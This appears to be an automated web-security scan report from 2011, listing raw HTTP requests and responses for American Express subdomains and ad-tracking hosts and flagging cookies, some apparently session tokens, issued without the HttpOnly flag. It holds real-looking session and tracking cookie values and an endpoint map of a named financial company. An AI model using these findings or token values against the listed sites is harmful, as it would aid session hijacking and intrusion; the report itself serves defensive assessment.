<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/home HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:11 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=0000HmJMpZYY_G5msSiTYEScCWJ:15bvkpc1o; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=252447242.47873.0000; path=/ Content-Length: 67227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/marketingprograms?inav=menu_business_merchmarket HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:20 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=0000a-qFEyjWmRA77-ia4auLoKF:15bvkorqu; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=873204234.47873.0000; path=/ Content-Length: 45136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/reportsandtrends HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:17 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=000014rUJ6zb3offa-6mrx3LyBv:15bvkorqu; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=873204234.47873.0000; path=/ Content-Length: 47317
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/legaldisclosures/websiterulesandregulations.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:28 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000nxFV_sTqmJW7c4-jAArCK9e:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:30 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000sm8JxdH8S2k1shfy-P8NSQw:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/feefreeservices/pages/globalassist_allccsg_shareddetails.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:40 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000yMXBfzRiROj5OAfOa5QNbix:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:43 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=000090KnSa_PToPYn1Y9A6kHv8g:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/pass_markup_homepage.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:34 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00000ddg062iZbtkKQLHV7glhsR:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/travelerschequesandforeigncurrency.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:38 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00000vjRd_mY3YpSpW5gdtG8i9S:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do?vgnextoid=f25533fadb4ca110VgnVCM100000defaad94RCRD&vgnextchannel=9823f30b6b1ca110VgnVCM100000defaad94RCRD&us_nu=footer&source=footer_privacy_statement HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:45 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000U01HD7ILpMUGqR_UyygusU9:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 55185
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Internet Privacy Statement</titl ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/smallbusiness/businesstravel/businesstravel.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:39 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00002CcYYbt_TpWnMDtRNICsW6f:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/merchants/nonsecure/acceptthecard.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:06 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000ah4vhZojFRvbev9f5GE_A4A:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/merchants/nonsecure/manageyouraccount.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:47 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000PTe6zKm28D31BsFXcYHD9d8:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/contactus/personalsavings.do?vgnextoid=d752e13f929a7210VgnVCM100000defaad94RCRD&page=7&inav=iNavUtilContact HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:16 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000fxhwIOrKDi2q99FOvTDSEpr:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 35307
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/fxip/fxinternationalpayments.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:10 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000gNZ28gvXI_sQMcByieAazU2:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/us/en/cmaproductspage.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:19 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00005KkxZLI1O88IVa_7J24YNHg:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /PowerLabsWeb/un/landingpage.htm HTTP/1.1 Host: www213.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:33 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944613478399; path=/; expires=Tue, 09-Feb-16 22:23:33 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=00000YZCQTdcKvGRMYP-Rq79eWY:129nma7r7;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 81548
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /openhome/smallbusiness.do HTTP/1.1 Host: www257.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:41 GMT Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0000uChEcdO9k6KqbMgMdp5Ow2Q:14t0oj3g0; Path=/ Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /entertainmentaccess/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:49 GMT Server: IBM_HTTP_Server Set-Cookie: ehub_JSESSIONID=0000NpczdATYAiPRlcF0VGZHggr:1563unio9; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 80280
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-card-travel-insurance/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:45 GMT Server: IBM_HTTP_Server Set-Cookie: fsea_JSESSIONID=00008GQpyAcWkVMiczzEQLBcHuM:156jli7te; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 36699
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-report-monitoring/enquiry.do?inav=menu_myacct_creditsecure HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:23:45 GMT Server: IBM_HTTP_Server Location: https://www99.americanexpress.com/myca/usermgt/us/action?request_type=authreg_PPLogin&lgnsrc=PP&Face=en_US&REDIRECT_URL=https%3A%2F%2Fwww295.americanexpress.com%2Fpremium%2Fcredit-report-monitoring%2Fenquiry.do%3FSC%3DL6L%26BC%3D0003%26PC%3D0001%26lgnsrc%3DPP%26Face%3Den_US Content-Length: 0 Set-Cookie: fsea_JSESSIONID=0000ax6luTP71CaQfFifYiUvIPV:156jli4a5; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html Content-Language: en-US
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=h4s6ert0qi7j4rpn3nuck010f0; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=7sg72sp5qujgp16nj7smqcsl13; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ca.gif?rb=233&ca=20472701&ct=728106282%20height=0%20width=0%20style= HTTP/1.1 Host: a.rfihub.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: m="aABseW9eg==AI20472701AAABLevCTs8="; f="aABZd22cg==AK1296740536AB1AAABLevCTs4="; a1=1CAESEDwKxKPrWufjyLofYqzf4_4; t=1296740537347; e=cd; a=c369013694478760033; o=1-BjMxrfcI6jt9; r=1296740536014
Response
HTTP/1.1 302 Found P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: m="aACjOGo3g==AI20472701AAABLffNWaU=AI20472701AAABLevCTs8=";Path=/;Domain=.rfihub.com;Expires=Mon, 06-Aug-12 21:49:46 GMT Set-Cookie: f="aAC5a_jbQ==AK1296942586AB1AAABLffNWaQ=AK1296740536AB1AAABLevCTs4=";Path=/;Domain=.rfihub.com;Expires=Mon, 06-Aug-12 21:49:46 GMT Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 06-Aug-12 21:49:46 GMT Cache-Control: no-cache Location: http://ib.adnxs.com/seg?add=56500&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D966993%26t%3D2%26piggyback%3Dhttp%253A%252F%252Fwww.googleadservices.com%252Fpagead%252Fconversion%252F1030878771%252F%253Flabel%253DwJh2CPel9gEQs-zH6wM%2526amp%253Bguid%253DON%2526amp%253Bscript%253D0 Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /i.cid?c=333063&d=30&page=landingPage HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: about.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 57470 Expires: Sat, 05 Feb 2011 21:50:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 21:50:53 GMT Connection: close Set-Cookie: BIGipServerAXAboutUs_Public=3725306048.20480.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sm/ HTTP/1.1 Host: about.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 36355 Expires: Sat, 05 Feb 2011 21:50:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 21:50:53 GMT Connection: close Set-Cookie: BIGipServerAXAboutUs_Public=3758860480.20480.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="sm.css" rel="styleshe ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orbserv/hbpix?pixId=3013 HTTP/1.1 Host: action.media6degrees.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt11o9ctxzt11txepxzt11txepxzt11o9ct; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv1txep00y10010606205; orblb=2lfk1rn0225810u010hlmv2dh10u0100000; rdrlst=...[SNIP]...; sglst=...[SNIP]...; vstcnt=...[SNIP]...
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: clid=2lebnns011706ch47d7o8wtv1ubnn00z10020607206; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: orblb=2lfk1rn0225810u020lxjs0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: rdrlst=...[SNIP]...; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: sglst=...[SNIP]...; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Location: http://ad.yieldmanager.com/pixel?t=2&id=702840 Content-Length: 0 Date: Sat, 05 Feb 2011 21:50:02 GMT
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click;h=v8/3aa5/3/0/*/v;233997820;0-0;0;57848017;1-468/60;39912829/39930616/1;;~okv=;pc=[TPAS_ID];;~sscs=?http:/personalsavings.americanexpress.com/savings-product.html HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://personalsavings.americanexpress.com/savings-product.html Set-Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 22:24:49 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click%3Bh%3Dv8/3aa5/3/0/%2a/v%3B233997820%3B0-0%3B0%3B57848017%3B1-468/60%3B39912829/39930616/1%3B%3B~okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B~sscs%3D%3fhttp://personalsavings.americanexpress.com/savings-product.html HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/2179194/1-HYSA_RateV2_468x60_30k.swf Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2818894/957634/15009,2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
